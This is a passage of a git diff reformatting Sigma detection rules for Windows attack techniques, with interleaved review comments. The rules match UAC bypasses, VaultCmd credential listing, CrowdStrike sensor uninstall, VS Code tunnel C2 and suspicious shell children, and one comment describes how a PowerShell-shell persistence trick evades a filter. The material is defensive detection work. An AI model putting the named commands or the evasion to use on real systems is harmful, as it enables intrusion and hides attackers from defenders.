https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: sdclt.exe + NewProcessName|endswith: sdclt.exe MandatoryLabel: S-1-16-12288 condition: process_creation and selection falsepositives: 
diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml index 2f349f1b6..5186bdf4e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: C:\Windows \System32\ + NewProcessName|contains: C:\Windows \System32\ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml index f569639f1..980f1ae8f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Windows Media Player - Process id: 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2 status: test -description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll - (UACMe 32) +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -20,14 +19,13 @@ detection: EventID: 4688 Channel: Security selection1: - NewProcessName: C:\Program Files\Windows Media Player\osk.exe + NewProcessName: C:\Program Files\Windows Media Player\osk.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 selection2: - ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" - /s' - NewProcessName: C:\Windows\System32\cmd.exe + ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s' + NewProcessName: C:\Windows\System32\cmd.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 
diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml index 099c72524..36917a869 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml @@ -1,18 +1,16 @@ title: Bypass UAC via WSReset.exe id: d797268e-28a9-49a7-b9a8-2f5039011c5c related: - - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae - type: obsoletes + - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae + type: obsoletes status: test -description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries - use this technique to execute privileged processes. +description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. references: - https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/ - https://www.activecyber.us/activelabs/windows-uac-bypass - https://twitter.com/ReaQta/status/1222548288731217921 -author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, - Florian Roth +author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth date: 2019/10/24 modified: 2022/05/13 tags: @@ -29,8 +27,8 @@ detection: selection: ParentProcessName|endswith: \wsreset.exe filter: - - NewProcessName|endswith: \conhost.exe - - OriginalFileName: CONHOST.EXE + - NewProcessName|endswith: \conhost.exe + - OriginalFileName: CONHOST.EXE condition: process_creation and (selection and not filter) falsepositives: - Unknown sub processes of Wsreset.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml index 4cf79382b..d5b8a5b8a 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \wsreset.exe + NewProcessName|endswith: \wsreset.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 diff --git a/sigma/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml index a31d1a500..6359b2458 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml @@ -1,9 +1,7 @@ title: Suspicious UltraVNC Execution id: 871b9555-69ca-4993-99d3-35a59f9f3599 status: test -description: Detects suspicious UltraVNC command line flag combination that indicate - a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon - threat group) +description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) references: - https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine @@ -24,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-autoreconnect ' - '-connect ' - '-id:' diff --git a/sigma/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml b/sigma/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml index da5b55b23..b14f538c8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml @@ -1,8 +1,7 @@ title: Uninstall Crowdstrike Falcon Sensor id: f0f7be61-9cf5-43be-9836-99d6ef448a18 status: test -description: Adversaries may disable security tools to avoid possible detection of - their tools and activities by uninstalling Crowdstrike Falcon +description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: frack113 @@ -19,13 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \WindowsSensor.exe - ' /uninstall' - ' /quiet' condition: process_creation and selection falsepositives: - - Administrator might leverage the same command line for debugging or other purposes. - However this action must be always investigated + - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml index 953574070..0a54c217d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml 
@@ -1,11 +1,10 @@ title: Uncommon Userinit Child Process id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 related: - - id: 21d856f9-9281-4ded-9377-51a1a6e2a432 - type: similar + - id: 21d856f9-9281-4ded-9377-51a1a6e2a432 + type: similar status: test -description: Detects uncommon "userinit.exe" child processes, which could be a sign - of uncommon shells or login scripts used for persistence. +description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. references: - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html - https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core 
@@ -25,31 +24,32 @@ detection: selection: ParentProcessName|endswith: \userinit.exe filter_main_explorer: - NewProcessName|endswith: :\WINDOWS\explorer.exe + NewProcessName|endswith: :\WINDOWS\explorer.exe filter_optional_logonscripts: - CommandLine|contains: + CommandLine|contains: - netlogon.bat - UsrLogon.cmd filter_optional_windows_core: - CommandLine: PowerShell.exe + # Note: This filter is mandatory on Windows Core machines as the default shell spawned by "userinit" is "powershell.exe". + # https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core + CommandLine: PowerShell.exe filter_optional_proquota: - NewProcessName|endswith: + NewProcessName|endswith: - :\Windows\System32\proquota.exe - :\Windows\SysWOW64\proquota.exe filter_optional_citrix: - NewProcessName|endswith: - - :\Program Files (x86)\Citrix\HDX\bin\cmstart.exe - - :\Program Files (x86)\Citrix\HDX\bin\icast.exe + NewProcessName|endswith: + # As reported by https://github.com/SigmaHQ/sigma/issues/4569 + - :\Program Files (x86)\Citrix\HDX\bin\cmstart.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command + - :\Program Files (x86)\Citrix\HDX\bin\icast.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command - :\Program Files (x86)\Citrix\System32\icast.exe - - :\Program Files\Citrix\HDX\bin\cmstart.exe - - :\Program Files\Citrix\HDX\bin\icast.exe + - :\Program Files\Citrix\HDX\bin\cmstart.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command + - :\Program Files\Citrix\HDX\bin\icast.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command - :\Program Files\Citrix\System32\icast.exe filter_optional_image_null: - NewProcessName: null - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + NewProcessName: + condition: process_creation and (selection and not 1 of filter_main_* and 
not 1 of filter_optional_*) falsepositives: - - Legitimate logon scripts or custom shells may trigger false positives. Apply - additional filters accordingly. + - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly. level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml b/sigma/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml index 7c25c7bd9..c4545522d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml @@ -1,8 +1,7 @@ title: Windows Credential Manager Access via VaultCmd id: 58f50261-c53b-4c88-bd12-1d71f12eda4c status: test -description: List credentials currently stored in Windows Credential Manager via the - native Windows utility vaultcmd.exe +description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd author: frack113 @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \VaultCmd.exe - - OriginalFileName: VAULTCMD.EXE + - NewProcessName|endswith: \VaultCmd.exe + - OriginalFileName: VAULTCMD.EXE selection_cli: - CommandLine|contains: '/listcreds:' + CommandLine|contains: '/listcreds:' condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml b/sigma/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml index 4d1f537b3..9676bb225 100644 --- a/sigma/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml +++ b/sigma/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml 
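Review bot: `filter_optional_windows_core` excludes any userinit child whose command line is exactly `PowerShell.exe` on every host, not just Server Core, since nothing in the rule keys on the OS edition; a Winlogon `Shell` value rewritten to `PowerShell.exe` with the payload in a PowerShell profile would therefore be suppressed on an ordinary workstation. The new comment calls the filter mandatory on Core, but it sits in the optional group and the condition treats it like any other optional filter, so the two statements should be reconciled. Suggest tightening it to the real binary, `NewProcessName|endswith: ':\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'` next to the existing `CommandLine: PowerShell.exe`, and adding `# On non-Core hosts consider removing this filter: a Winlogon Shell pointing at PowerShell.exe is itself worth investigating`. Separately, `filter_optional_image_null` now relies on the YAML loader resolving the empty scalar after `NewProcessName:` to null, which the explicit `null` made unambiguous for readers; if the conversion tool requires the empty form, a short comment saying so would help.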
@@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \verclsid.exe - - OriginalFileName: verclsid.exe + - NewProcessName|endswith: \verclsid.exe + - OriginalFileName: verclsid.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /S - /C condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_virtualbox_execution.yml b/sigma/builtin/process_creation/proc_creation_win_virtualbox_execution.yml index ac4e257b9..25425d829 100644 --- a/sigma/builtin/process_creation/proc_creation_win_virtualbox_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_virtualbox_execution.yml @@ -1,9 +1,7 @@ title: Detect Virtualbox Driver Installation OR Starting Of VMs id: bab049ca-7471-4828-9024-38279a4c04da status: test -description: Adversaries can carry out malicious operations using a virtual instance - to avoid detection. This rule is built to detect the registration of the Virtualbox - driver or start of a Virtualbox VM. +description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. references: - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ - https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/ @@ -22,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - VBoxRT.dll,RTR3Init - VBoxC.dll - VBoxDrv.sys selection_2: - CommandLine|contains: + CommandLine|contains: - startvm - controlvm condition: process_creation and (1 of selection_*) 
@@ -37,7 +35,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - This may have false positives on hosts where Virtualbox is legitimately being - used for operations + - This may have false positives on hosts where Virtualbox is legitimately being used for operations level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml b/sigma/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml index eff2d5a7f..8104fd239 100644 --- a/sigma/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml @@ -1,14 +1,10 @@ title: Suspicious VBoxDrvInst.exe Parameters id: b7b19cb6-9b32-4fc4-a108-73f19acfe262 status: test -description: 'Detect VBoxDrvInst.exe run with parameters allowing processing INF file. - +description: | + Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. - - For example one could use this technique to obtain persistence via modifying one - of Run or RunOnce registry keys - - ' + For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys references: - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml - https://twitter.com/pabraeken/status/993497996179492864 @@ -26,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - driver - executeinf - NewProcessName|endswith: \VBoxDrvInst.exe + NewProcessName|endswith: \VBoxDrvInst.exe condition: process_creation and selection fields: - SubjectUserName 
@@ -37,7 +33,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation - process + - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml index 8d91fdefc..b92a25eb6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d related: - - id: 236d8e89-ed95-4789-a982-36f4643738ba - type: derived + - id: 236d8e89-ed95-4789-a982-36f4643738ba + type: derived status: experimental -description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and - "set" flag to setup a specific script to run for a specific VM state +description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ - https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/ @@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \VMwareToolBoxCmd.exe - - OriginalFileName: toolbox-cmd.exe + - NewProcessName|endswith: \VMwareToolBoxCmd.exe + - OriginalFileName: toolbox-cmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' script ' - ' set ' condition: process_creation and (all of selection_*) 
diff --git a/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml b/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml index 602589ac3..398024bf7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml @@ -1,12 +1,10 @@ title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script id: 236d8e89-ed95-4789-a982-36f4643738ba related: - - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d - type: derived + - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d + type: derived status: experimental -description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and - "set" flag to setup a specific script that's located in a potentially suspicious - location to run for a specific VM state +description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_bin_img: - - NewProcessName|endswith: \VMwareToolBoxCmd.exe - - OriginalFileName: toolbox-cmd.exe + - NewProcessName|endswith: \VMwareToolBoxCmd.exe + - OriginalFileName: toolbox-cmd.exe selection_bin_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' script ' - ' set ' selection_susp_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - :\Windows\System32\Tasks\ diff --git a/sigma/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml index 8f75c3675..7fe0a6962 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml @@ -1,8 +1,7 @@ title: VMToolsd Suspicious Child Process id: 5687f942-867b-4578-ade7-1e341c46e99a status: experimental -description: Detects suspicious child process creations of VMware Tools process which - may indicate persistence setup +description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ - https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png 
@@ -24,37 +23,37 @@ detection: selection_parent: ParentProcessName|endswith: \vmtoolsd.exe selection_img: - - NewProcessName|endswith: - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - MSHTA.EXE - - PowerShell.EXE - - pwsh.dll - - REGSVR32.EXE - - RUNDLL32.EXE - - wscript.exe + - NewProcessName|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - MSHTA.EXE + - PowerShell.EXE + - pwsh.dll + - REGSVR32.EXE + - RUNDLL32.EXE + - wscript.exe filter_main_vmwaretools_script: - CommandLine|contains: + CommandLine|contains: - \VMware\VMware Tools\poweron-vm-default.bat - \VMware\VMware Tools\poweroff-vm-default.bat - \VMware\VMware Tools\resume-vm-default.bat - \VMware\VMware Tools\suspend-vm-default.bat - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_main_empty: - CommandLine: '' - NewProcessName|endswith: \cmd.exe + CommandLine: '' + NewProcessName|endswith: \cmd.exe filter_main_null: - CommandLine: null - NewProcessName|endswith: \cmd.exe + CommandLine: + NewProcessName|endswith: \cmd.exe condition: process_creation and (all of selection* and not 1 of filter_main_*) falsepositives: - Legitimate use by VM administrator diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml index 15b2e4422..f14841697 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml 
@@ -1,9 +1,7 @@ title: Potentially Suspicious Child Process Of VsCode id: 5a3164f2-b373-4152-93cf-090b13c12d27 status: experimental -description: Detects uncommon or suspicious child processes spawning from a VsCode - "code.exe" process. This could indicate an attempt of persistence via VsCode tasks - or terminal profiles. +description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. references: - https://twitter.com/nas_bench/status/1618021838407495681 - https://twitter.com/nas_bench/status/1618021415852335105 @@ -25,14 +23,14 @@ detection: selection_parent: ParentProcessName|endswith: \code.exe selection_children_images: - NewProcessName|endswith: + NewProcessName|endswith: - \calc.exe - \regsvr32.exe - \rundll32.exe - \cscript.exe - \wscript.exe selection_children_cli: - CommandLine|contains: + CommandLine|contains: - Invoke-Expressions - IEX - Invoke-Command @@ -42,19 +40,18 @@ detection: - regsvr32 - wscript - cscript - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \cmd.exe selection_children_paths: - NewProcessName|contains: + NewProcessName|contains: + # Add more suspicious locations - :\Users\Public\ - :\Windows\Temp\ - :\Temp\ condition: process_creation and (selection_parent and 1 of selection_children_*) falsepositives: - - In development environment where VsCode is used heavily. False positives may - occur when developers use task to compile or execute different types of code. - Remove or add processes accordingly + - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly level: medium ruletype: Sigma 
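Review bot: `Invoke-Expressions` in selection_children_cli (a context line this hunk re-indents around) only matches the plural spelling; the cmdlet is `Invoke-Expression`, and a command line using it does not contain `IEX` either, so the un-aliased form currently falls through this selection. Unless the plural is deliberate, change the entry to `- Invoke-Expression`, which as a `contains` match also covers the plural.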
diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml index eccd21be6..d02420007 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml @@ -1,8 +1,7 @@ title: Visual Studio Code Tunnel Execution id: 90d6bd71-dffb-4989-8d86-a827fedd6624 status: experimental -description: Detects Visual Studio Code tunnel execution. Attackers can abuse this - functionality to establish a C2 channel +description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -20,20 +19,20 @@ detection: EventID: 4688 Channel: Security selection_only_tunnel: - OriginalFileName: null - CommandLine|endswith: .exe tunnel + OriginalFileName: + CommandLine|endswith: .exe tunnel selection_tunnel_args: - CommandLine|contains|all: + CommandLine|contains|all: - .exe tunnel - '--name ' - --accept-server-license-terms selection_parent_tunnel: ParentCommandLine|endswith: ' tunnel' - CommandLine|contains|all: + CommandLine|contains|all: - '/d /c ' - \servers\Stable- - code-server.cmd - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use of Visual Studio Code tunnel diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml index 60b471734..3769b8255 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml 
@@ -1,9 +1,7 @@ title: Visual Studio Code Tunnel Shell Execution id: f4a623c2-4ef5-4c33-b811-0642f702c9f1 status: experimental -description: Detects the execution of a shell (powershell, bash, wsl...) via Visual - Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel - and execute arbitrary commands on the system. +description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -21,16 +19,17 @@ detection: EventID: 4688 Channel: Security selection_parent: - ParentCommandLine|contains: .vscode-server + ParentCommandLine|contains: .vscode-server # Technically one can host its own local server instead of using the VsCode one. And that would probably change the name (requires further research) + # Note: Child processes (ie: shells) can be whatever technically (with some efforts) ParentProcessName|contains: \servers\Stable- ParentProcessName|endswith: \server\node.exe selection_child_1: - CommandLine|contains: \terminal\browser\media\shellIntegration.ps1 - NewProcessName|endswith: + CommandLine|contains: \terminal\browser\media\shellIntegration.ps1 + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_child_2: - NewProcessName|endswith: + NewProcessName|endswith: - \wsl.exe - \bash.exe condition: process_creation and (selection_parent and 1 of selection_child_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml index bfa44f3ea..2dfa073ee 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml 
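Review bot: The trailing comment added to `ParentCommandLine|contains: .vscode-server` is longer than the line it annotates and carries an open question ("requires further research"); that caveat belongs in the rule's `falsepositives` or `description`, with the selection line kept short. The second added comment sits between two keys of the same map, where it reads as a note on `ParentProcessName|contains`; moving it above `selection_parent:` and expanding "ie" would make it clearer, e.g. `# Note: only common shells are listed below; the server can spawn any child process`.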
@@ -1,8 +1,7 @@ title: Renamed Visual Studio Code Tunnel Execution id: 2cf29f11-e356-4f61-98c0-1bdb9393d6da status: experimental -description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse - this functionality to establish a C2 channel +description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -20,36 +19,35 @@ detection: EventID: 4688 Channel: Security selection_image_only_tunnel: - OriginalFileName: null - CommandLine|endswith: .exe tunnel + OriginalFileName: + CommandLine|endswith: .exe tunnel selection_image_tunnel_args: - CommandLine|contains|all: + CommandLine|contains|all: - .exe tunnel - '--name ' - --accept-server-license-terms selection_image_tunnel_service: - CommandLine|contains|all: + CommandLine|contains|all: - 'tunnel ' - service - internal-run - tunnel-service.log selection_parent_tunnel: ParentCommandLine|endswith: ' tunnel' - CommandLine|contains|all: + CommandLine|contains|all: - '/d /c ' - \servers\Stable- - code-server.cmd - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_main_parent_code: ParentProcessName|endswith: - \code-tunnel.exe - \code.exe filter_main_image_code: - NewProcessName|endswith: + NewProcessName|endswith: - \code-tunnel.exe - \code.exe - condition: process_creation and ((1 of selection_image_* and not 1 of filter_main_image_*) - or (1 of selection_parent_* and not 1 of filter_main_parent_*)) + condition: process_creation and ((1 of selection_image_* and not 1 of filter_main_image_*) or (1 of selection_parent_* and not 1 of filter_main_parent_*)) falsepositives: - Unknown level: high 
diff --git a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml index f5f9d6459..32fb23746 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'tunnel ' - service - internal-run diff --git a/sigma/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml b/sigma/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml index 66d3b892d..3e1d94483 100644 --- a/sigma/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml @@ -1,8 +1,7 @@ title: Potential Binary Proxy Execution Via VSDiagnostics.EXE id: ac1c92b4-ac81-405a-9978-4604d78cc47e status: experimental -description: Detects execution of 